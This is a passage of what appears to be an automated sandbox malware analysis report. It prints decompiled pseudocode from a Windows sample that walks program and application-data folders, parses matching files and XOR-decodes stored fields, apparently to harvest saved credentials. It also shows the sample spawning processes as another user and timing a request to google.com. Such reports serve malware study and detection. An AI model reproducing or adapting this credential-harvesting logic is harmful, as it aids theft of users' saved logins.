						_t29 =  &_v16;
						E0040DE68( &_v572,  &_v16, _t37, 1, 2, E00417C38,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E0040868F(_v12);
				}
				_push(0x58);
				return E00416E46(_t29, _v12);
			}

0x00417ede
0x00417ee1
0x00417ee2
0x00417eeb
0x00417ef5
0x00417efc
0x00417f03
0x00417f0a
0x00417f0f
0x00417f11
0x00417f11
0x00417f1f
0x00417f25
0x00417f27
0x00417f39
0x00417f42
0x00417f42
0x00417f47
0x00417f48
0x00417f50
0x00000000
0x00417f62
0x00417f55
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00417F1F

Part of subcall function 0040DE68: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040DEA7
Part of subcall function 0040DE68: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040DECE
Part of subcall function 0040DE68: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040DF19
Part of subcall function 0040DE68: Sleep.KERNEL32(00000000,?,?), ref: 0040DF76
Part of subcall function 0040DE68: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040DFA4
Part of subcall function 0040DE68: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040DFB6

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

Strings

&, xrefs: 00417EF5
#, xrefs: 00417F03

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: f2e026c6d7af8bc315824d725325e09d0fa689f939d1c142a86dcf45d03f2dfe
Instruction ID: a84b86893bb690bc3159760849fb8c02820be1666d80cf8d1ba6285914f96509
Opcode Fuzzy Hash: f2e026c6d7af8bc315824d725325e09d0fa689f939d1c142a86dcf45d03f2dfe
Instruction Fuzzy Hash: CD117072941228BADB20AA92DD09EDF7F78EF41754F00005AF508B6180D7785786CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004187E6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E004187E6(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				void* _t17;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				_t17 = 0x6b;
				E00412F05(_t17, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00408742( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0040DE68( &_v580,  &_v16, _t37, 1, 2, E0041855E,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E0040868F(_v12);
				}
				_push(0x6c);
				return E00416E46(_t29, _v12);
			}

0x004187f3
0x004187f6
0x004187f7
0x00418800
0x0041880a
0x00418811
0x00418818
0x0041881f
0x00418824
0x00418826
0x00418826
0x00418834
0x0041883a
0x0041883c
0x0041884e
0x00418857
0x00418857
0x0041885c
0x0041885d
0x00418865
0x00000000
0x00418877
0x0041886a
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00418834

Part of subcall function 0040DE68: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040DEA7
Part of subcall function 0040DE68: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040DECE
Part of subcall function 0040DE68: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040DF19
Part of subcall function 0040DE68: Sleep.KERNEL32(00000000,?,?), ref: 0040DF76
Part of subcall function 0040DE68: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040DFA4
Part of subcall function 0040DE68: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040DFB6

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

Strings

#, xrefs: 00418818
&, xrefs: 0041880A

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: e570562cf7f9d1b987d5305c5a32918b61614ca0289ee362f50fd0b10cda93f9
Instruction ID: 86de09e8f9b9c5443ca8335b773dc46518c97ddb313c89ec9343920ca056fa77
Opcode Fuzzy Hash: e570562cf7f9d1b987d5305c5a32918b61614ca0289ee362f50fd0b10cda93f9
Instruction Fuzzy Hash: A8115A72A01228BADB20AA92DD49EDF7F79EB45754F00006AB608B6080DB795685CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0E0(void* __ecx, WCHAR* __edi, signed int _a4) {
				char _v108;
				char _v158;
				char _v178;
				char _v198;
				char _v596;
				void* __esi;
				signed int _t12;
				int _t14;
				WCHAR* _t16;
				char* _t18;
				WCHAR* _t19;

				_t19 = __edi;
				 *__edi = 0;
				E0041A08B(__ecx,  &_v596);
				_t12 = _a4;
				if(_t12 == 0) {
					L6:
					_t18 =  &_v178;
					goto L7;
				} else {
					_t12 = _t12 - 1;
					if(_t12 == 0) {
						_t18 =  &_v198;
						L7:
						_t16 = 0x4218c8;
						goto L8;
					} else {
						_t12 = _t12 - 1;
						if(_t12 == 0) {
							goto L6;
						} else {
							_t14 = _t12 - 1;
							if(_t14 == 0) {
								_t16 = L"SOFTWARE\\Microsoft";
								_t18 =  &_v158;
								L8:
								_t21 =  &_v108;
								_t14 = E0040889D(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
								if(_t14 != 0) {
									_t14 = E0040DFC5(_t21, _t19, _t16);
									if(_t14 == 0) {
										L12:
										_t14 = 0;
										 *_t19 = 0;
									} else {
										if(_a4 == 0) {
											_t14 = PathRenameExtensionW(_t19, L".dat");
											if(_t14 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t14;
			}

0x0041a0e0
0x0041a0ec
0x0041a0f7
0x0041a0ff
0x0041a102
0x0041a122
0x0041a122
0x00000000
0x0041a104
0x0041a104
0x0041a105
0x0041a11a
0x0041a128
0x0041a128
0x00000000
0x0041a107
0x0041a107
0x0041a108
0x00000000
0x0041a10a
0x0041a10a
0x0041a10b
0x0041a10d
0x0041a112
0x0041a12d
0x0041a131
0x0041a137
0x0041a13e
0x0041a144
0x0041a14b
0x0041a163
0x0041a163
0x0041a165
0x0041a14d
0x0041a151
0x0041a159
0x0041a161
0x00000000
0x00000000
0x0041a161
0x0041a151
0x0041a14b
0x0041a13e
0x0041a10b
0x0041a108
0x0041a105
0x0041a16b

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,004218C8,00000000,00000032,?), ref: 0041A159

Strings

.dat, xrefs: 0041A153
SOFTWARE\Microsoft, xrefs: 0041A10D

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3337224433-47915998
Opcode ID: 41c0b77d67a19395490a16e1b7076ed06e7dddd43c573ca7192cc057cb9f1b81
Instruction ID: 7b5d44f3e161a408c0d05eadf4939d5398467784be270b58a486c1d5b4f8111e
Opcode Fuzzy Hash: 41c0b77d67a19395490a16e1b7076ed06e7dddd43c573ca7192cc057cb9f1b81
Instruction Fuzzy Hash: DC012F712016097ADB209B74CD81BEB73A8AF50748F940027E90AE22C1E77CCEE4C65F

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040DAB8(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E00409ABB());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E00409450(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E0040DFC5(_t19, _a8,  &_v524) == 0 || E0040D8AB(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040dadb
0x0040db35
0x00000000
0x0040db35
0x0040dadd
0x0040dadf
0x0040dadf
0x0040dae7
0x0040dae8
0x0040daf7
0x0040dafd
0x0040db02
0x0040db08
0x00000000
0x00000000
0x0040db1d
0x0040db2f
0x0040db33
0x00000000
0x00000000
0x00000000
0x0040db3d
0x00000000
0x0040db3d
0x0040db1d
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040DACF

Part of subcall function 00409ABB: GetTickCount.KERNEL32 ref: 00409ABB

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

Part of subcall function 0040D8AB: CreateFileW.KERNEL32(0040A16E,40000000,00000001,00000000,00000002,00000080,00000000,00000000,?,?,0040DB2B,0040A16E,00000000,00000000,0040A16E,?), ref: 0040D8C5
Part of subcall function 0040D8AB: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,0040DB2B,0040A16E,00000000,00000000,0040A16E,?), ref: 0040D8E8
Part of subcall function 0040D8AB: CloseHandle.KERNEL32(00000000,?,?,0040DB2B,0040A16E,00000000,00000000,0040A16E,?), ref: 0040D8F5

Strings

tmp, xrefs: 0040DAE8
%s%08x.%s, xrefs: 0040DAED

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: dec7b8172b102e651fced977a9769dd398ff5a6b2c97ec5d0f8eef3bc56e5b27
Instruction ID: 436f4ae5c4c2822acf9a5e2a5004a152e0596460581ee6f6cb0899d6340f38e4
Opcode Fuzzy Hash: dec7b8172b102e651fced977a9769dd398ff5a6b2c97ec5d0f8eef3bc56e5b27
Instruction Fuzzy Hash: DA01493690021836DF207AA89C06FEF3728DB01714F104173BD25B31E2C279AE8E965C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C279 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C279(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				intOrPtr _t24;
				int _t26;

				_t26 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E0040DA97( &_v524) != 0) {
					_t24 = _a4;
					E004092DE(PathFindFileNameW( &_v524), _a8 + 0xfffffffd);
					E004086CB(_t24, "?T", 2);
					 *((char*)(_t24 + 2)) = 0x5c;
					_t26 = 1;
				}
				return _t26;
			}

0x0040c28d
0x0040c2a3
0x0040c2b9
0x0040c2d2
0x0040c2df
0x0040c2e6
0x0040c2ea
0x0040c2eb
0x0040c2f0

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040C29B

Part of subcall function 0040DA97: SetFileAttributesW.KERNEL32(00000080,00000080,004058D2,?), ref: 0040DAA0
Part of subcall function 0040DA97: DeleteFileW.KERNEL32(?), ref: 0040DAAA

PathFindFileNameW.SHLWAPI(?,?,?,?), ref: 0040C2CA

Strings

cab, xrefs: 0040C290

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$Name$AttributesDeleteFindPathTemp
String ID: cab
API String ID: 394148526-1787492089
Opcode ID: 576cd2ff84580841126457a92aec627e758b0c3fe5b17617e6061266b09ef3d4
Instruction ID: 7c5d50b3d620e5c793e3dce7f94305c60f0f2eb1dab7ea7686238e983ba0b7dc
Opcode Fuzzy Hash: 576cd2ff84580841126457a92aec627e758b0c3fe5b17617e6061266b09ef3d4
Instruction Fuzzy Hash: D5018672A00214A7CB109BA5CC4AFCBB7AC9F44754F00427AB955F72D2DA78E9058AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00413DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00413DE0(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E0040BD77(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E004094CB( &_a4,  &M004032A0, _a16) > 0) {
								E00409FB8(_t27, _a4);
								E0040868F(_a4);
							}
						}
						E0040868F(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x00413dea
0x00413def
0x00413dfa
0x00413dfe
0x00413e0d
0x00413e13
0x00413e29
0x00413e2f
0x00413e37
0x00413e37
0x00413e3c
0x00413e3e
0x00413e3e
0x00000000
0x00413e4c
0x00413e4e

APIs

Part of subcall function 0040BD77: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?,00000000,00000000,?,?,00409CD2,?,?,?,0040527C,00000000,?), ref: 0040BD90
Part of subcall function 0040BD77: GetLastError.KERNEL32(?,?,00409CD2,?,?,?,0040527C,00000000,?), ref: 0040BD96
Part of subcall function 0040BD77: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,00409CD2,?,?,?,0040527C,00000000,?), ref: 0040BDBC

EqualSid.ADVAPI32(00000000,?,?), ref: 00413E05

Part of subcall function 00409FB8: LoadLibraryA.KERNEL32(userenv.dll), ref: 00409FC9
Part of subcall function 00409FB8: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00409FE8
Part of subcall function 00409FB8: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00409FF4
Part of subcall function 00409FB8: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000044), ref: 0040A065
Part of subcall function 00409FB8: CloseHandle.KERNEL32(?), ref: 0040A078
Part of subcall function 00409FB8: CloseHandle.KERNEL32(?), ref: 0040A07D
Part of subcall function 00409FB8: FreeLibrary.KERNEL32(?), ref: 0040A094

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

CloseHandle.KERNEL32(?,?), ref: 00413E46

Strings

"%s", xrefs: 00413E19

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: 1b0303914590d5e33308123ba48d0817f5d46e9089d3d8f90819be83bed33d93
Instruction ID: 995dc2a0aefffd24b2707e5bd8ac380d6eff0bcd2fc409f038b0cd95a7573304
Opcode Fuzzy Hash: 1b0303914590d5e33308123ba48d0817f5d46e9089d3d8f90819be83bed33d93
Instruction Fuzzy Hash: FEF01D35100249BBCF026F22ED05DEF3F69EF44755B04853ABC18E5162DB3ACA60DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A75D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A75D(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v55;
				char _v56;
				void* __edi;
				intOrPtr _t27;

				_t27 = 0;
				_v56 = 1;
				_v55 = 1;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E0040A6DC();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E0040A5AA( &_v56, 0) != 0) {
					_t27 = GetTickCount() - _v8;
				}
				E0040868F(_v44);
				return _t27;
			}

0x0040a765
0x0040a768
0x0040a76c
0x0040a770
0x0040a773
0x0040a781
0x0040a784
0x0040a78b
0x0040a78e
0x0040a791
0x0040a794
0x0040a797
0x0040a79a
0x0040a7a1
0x0040a7aa
0x0040a7b4
0x0040a7ba
0x0040a7ba
0x0040a7c0
0x0040a7cb

APIs

Part of subcall function 0040A6DC: LoadLibraryA.KERNEL32(urlmon.dll), ref: 0040A6ED
Part of subcall function 0040A6DC: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040A700
Part of subcall function 0040A6DC: FreeLibrary.KERNEL32(?), ref: 0040A752

GetTickCount.KERNEL32 ref: 0040A7A4

Part of subcall function 0040A5AA: WaitForSingleObject.KERNEL32(?,?,?), ref: 0040A5FE
Part of subcall function 0040A5AA: InternetCloseHandle.WININET(00000000), ref: 0040A697

GetTickCount.KERNEL32 ref: 0040A7B6

Strings

http://www.google.com/webhp, xrefs: 0040A784

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: b471f8e4e95c7e07ce5276c846a89feeed712d65350e14b1533300292caa1b2b
Instruction ID: 7fdc5fe313328d3f6c7211e6e8e0ea5902e7e21b479c91170dc617ce1d3709fc
Opcode Fuzzy Hash: b471f8e4e95c7e07ce5276c846a89feeed712d65350e14b1533300292caa1b2b
Instruction Fuzzy Hash: E8011AB1C1122CAACF00DFE9D9445CEFFB8AF08748F10416BE900B7241C3B95A048BE9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(@,@,?,?,?,0040E5E2,00000000), ref: 0040DA3B

Strings

@, xrefs: 0040DA38
@, xrefs: 0040DA34, 0040DA37

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: FileSize
String ID: @$@
API String ID: 3433856609-2930932199
Opcode ID: 02fc87b06b7543de92686cb30d508853805938f3f4d06696165b7cd65b8f9ccc
Instruction ID: c74233938453d791292acb69147d86571d3b4a8a4a8752b123cc2e2232f79a71
Opcode Fuzzy Hash: 02fc87b06b7543de92686cb30d508853805938f3f4d06696165b7cd65b8f9ccc
Instruction Fuzzy Hash: 5ED05E71B04108BBDB05DB99CC01D9E7BBDAB953A0B108231B521A62D0D370EE058A68

Uniqueness

Uniqueness Score: -1.00%

Function 0041855E Relevance: 5.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041855E(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t75;
				char* _t76;
				intOrPtr _t78;
				char* _t82;
				void* _t83;
				void* _t85;
				void* _t87;
				void* _t89;
				char** _t95;
				char* _t106;
				char* _t112;
				char* _t113;
				void* _t114;
				char* _t117;
				char* _t118;
				void* _t122;
				char* _t150;
				void* _t151;
				signed int _t161;
				char* _t162;
				char** _t163;
				intOrPtr _t165;
				char* _t166;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x294;
				if(E0040DFC5( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t172 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t75 = 2;
					_t76 = E0040D910(_t75,  &_v524,  &_v612);
					__eflags = _t76;
					if(_t76 == 0) {
						goto L31;
					}
					_t78 = E00408F6D(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t78;
					__eflags = _t78 - 0xffffffff;
					if(_t78 == 0xffffffff) {
						L30:
						E0040D9B8( &_v612);
						goto L31;
					}
					_t82 = E0040865F(0x622);
					_v640 = _t82;
					_t83 = 0x67;
					E00412ECF(_t83,  &_v588);
					_t85 = 0x68;
					E00412ECF(_t85,  &_v628);
					_t87 = 0x69;
					E00412ECF(_t87,  &_v620);
					_t89 = 0x6a;
					E00412ECF(_t89,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E0040868F(_v640);
						E004086AB(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t161 = _v644 << 2;
							_t95 = _v652 + _t161;
							__eflags =  *_t95;
							if( *_t95 == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *_t95,  &_v588);
							_t150 = StrStrIA( *(_t161 + _v656),  &_v632);
							_v668 = StrStrIA( *(_t161 + _v660),  &_v628);
							_t106 = StrStrIA( *(_t161 + _v664),  &_v588);
							__eflags = _v676;
							_t162 = _t106;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t162;
							if(_t162 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t163 =  &(_t162[0xa]);
							_v652 = _t163;
							E00418536(_v676);
							E00418536(_v672);
							E00418536(_t163);
							__eflags = _t150;
							if(_t150 == 0) {
								L15:
								_t151 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t112 =  *_t163;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L28;
								}
								__eflags = _t112 - 0x30;
								if(_t112 == 0x30) {
									L21:
									__eflags = _t163[0];
									if(_t163[0] == 0) {
										goto L28;
									}
									L22:
									_t113 = 0;
									__eflags =  *_t163;
									if( *_t163 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t113[_t163] = _t113[_t163] ^ 0x00000019;
										_t113 =  &(_t113[1]);
										__eflags = _t113[_t163];
									} while (_t113[_t163] != 0);
									__eflags = _t113;
									if(_t113 > 0) {
										_t164 =  &_v580;
										_t114 = 0x2d;
										E00412F05(_t114,  &_v580);
										_push(_t151);
										_push(_v676);
										_t152 = _v656;
										_push(_v652);
										_push(_v672);
										_t117 = E00409450(_t164, 0x311, _v656, _t164);
										_t169 = _t169 + 0x14;
										__eflags = _t117;
										if(_t117 > 0) {
											_t165 = _a4;
											_t118 = E00408A85(_t117, _t165, _t152);
											__eflags = _t118;
											if(_t118 != 0) {
												_t61 = _t165 + 4;
												 *_t61 =  &(( *(_t165 + 4))[1]);
												__eflags =  *_t61;
											}
										}
									}
									goto L28;
								}
								__eflags = _t112 - 0x31;
								if(_t112 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_t153 =  &(_t150[6]);
							_v648 =  &(_t150[6]);
							E00418536(_t153);
							_t151 = E00408D25(_v648, _t153, 0);
							__eflags = _t151 - 1;
							if(_t151 < 1) {
								goto L15;
							}
							__eflags = _t151 - 0xffff;
							if(_t151 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t166 =  &_v612;
					_t122 = 0x66;
					E00412F05(_t122, _t166);
					_v648 = _t166;
					E0040DE68( &_v524,  &_v648, _t172, 1, 5, E0041855E, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x00418564
0x00418582
0x004187db
0x004187e3
0x004187e3
0x00418588
0x0041858b
0x004185cc
0x004185cf
0x004185d4
0x004185d9
0x004185db
0x00000000
0x00000000
0x004185f2
0x004185f7
0x004185fb
0x004185fe
0x004187d2
0x004187d6
0x00000000
0x004187d6
0x00418609
0x00418610
0x00418618
0x00418619
0x00418624
0x00418625
0x00418630
0x00418631
0x0041863c
0x0041863d
0x00418642
0x00418646
0x004187bc
0x004187c0
0x004187cd
0x00000000
0x004187cd
0x0041864c
0x00418650
0x00418654
0x00418660
0x00418668
0x0041866b
0x0041866d
0x00418670
0x00000000
0x00000000
0x0041867f
0x00418691
0x004186a1
0x004186b1
0x004186b3
0x004186b8
0x004186ba
0x00000000
0x00000000
0x004186c0
0x004186c5
0x00000000
0x00000000
0x004186cb
0x004186cd
0x00000000
0x00000000
0x004186d3
0x004186dc
0x004186e1
0x004186e4
0x004186e8
0x004186f1
0x004186f8
0x004186fd
0x004186ff
0x00418729
0x0041872b
0x0041872c
0x00418730
0x00418733
0x00000000
0x00000000
0x00418739
0x0041873c
0x00000000
0x00000000
0x0041873e
0x00418740
0x00418742
0x00000000
0x00000000
0x00418744
0x00418746
0x0041874c
0x0041874c
0x00418750
0x00000000
0x00000000
0x00418752
0x00418752
0x00418754
0x00418756
0x00000000
0x00000000
0x00000000
0x00000000
0x00418758
0x00418758
0x00418758
0x0041875c
0x0041875d
0x0041875d
0x00418763
0x00418765
0x00418769
0x0041876d
0x0041876e
0x00418773
0x00418774
0x00418778
0x0041877c
0x00418782
0x0041878c
0x00418791
0x00418794
0x00418796
0x00418798
0x0041879e
0x004187a3
0x004187a5
0x004187a7
0x004187a7
0x004187a7
0x004187a7
0x004187a5
0x00418796
0x00000000
0x00418765
0x00418748
0x0041874a
0x00000000
0x00000000
0x00000000
0x0041874a
0x00418701
0x00418706
0x0041870a
0x0041871a
0x0041871c
0x0041871f
0x00000000
0x00000000
0x00418721
0x00418727
0x00000000
0x00000000
0x00000000
0x004187aa
0x004187aa
0x004187b2
0x004187b2
0x00418660
0x00000000
0x0041858d
0x0041858f
0x00418593
0x00418594
0x0041859b
0x004185bb
0x00000000
0x004185bb

APIs

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

StrStrIA.SHLWAPI(00000000,?,?,00000001,00000000,?), ref: 0041867D
StrStrIA.SHLWAPI(?,?), ref: 0041868F
StrStrIA.SHLWAPI(?,?), ref: 0041869F
StrStrIA.SHLWAPI(?,?), ref: 004186B1

Part of subcall function 0040DE68: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040DEA7
